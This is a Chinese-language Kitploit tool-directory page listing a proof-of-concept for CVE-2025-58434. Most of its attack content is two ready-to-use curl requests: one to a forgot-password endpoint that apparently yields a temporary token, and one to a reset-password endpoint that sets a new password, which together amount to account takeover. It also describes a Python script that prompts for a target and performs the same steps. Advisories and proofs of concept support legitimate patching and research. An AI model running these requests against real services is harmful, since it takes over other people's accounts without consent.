Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-58434-PoC — CVE-2025-58434 概念验证 | Kitploit
工具/GitHubGitHub/mananispiwpiw/cve-2025-58434-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubmananispiwpiw/cve-2025-58434-poc

CVE-2025-58434-PoC

CVE-2025-58434 概念验证

查看仓库
3个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-58434 PoC

用于触发 POST /api/v1/account/forgot-password 的 Python 概念验证脚本。

⚠️ 仅供教育和已获授权的安全研究使用。 将此工具用于你不拥有或未经书面许可测试的系统是违法的。

致谢

  • zaddy6 (Isaac David)
  • arthurgervais (Arthur Gervais)

详情

  • CVE-2025-58434 的 PoC
  • 参考: https://github.com/advisories/GHSA-wgpv-6j63-x5ph

文件

  • poc.py: 提示输入机器 URL/IP、目标邮箱和密码(如果输入裸主机/IP 还会提示协议);然后发送请求并打印 HTTP 状态、响应头和响应正文,类似于 curl -i

使用方法

运行:

root@kitploit:~
python3 poc.py

然后提供:

  • 机器 URL/IP,例如 10.10.11.10、http://10.10.11.10 或 https://target.example
  • 协议(如果输入的是裸主机/IP,则按提示提供)
  • 邮箱地址
  • 密码

等效的 curl 命令

第一个请求

root@kitploit:~
curl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<[email protected]>"}}'

第二个请求

root@kitploit:~
curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
        "user":{
          "email":"<[email protected]>",
          "tempToken":"<tempToken>",
          "password":"NewSecurePassword123!"
        }
      }'
下载工具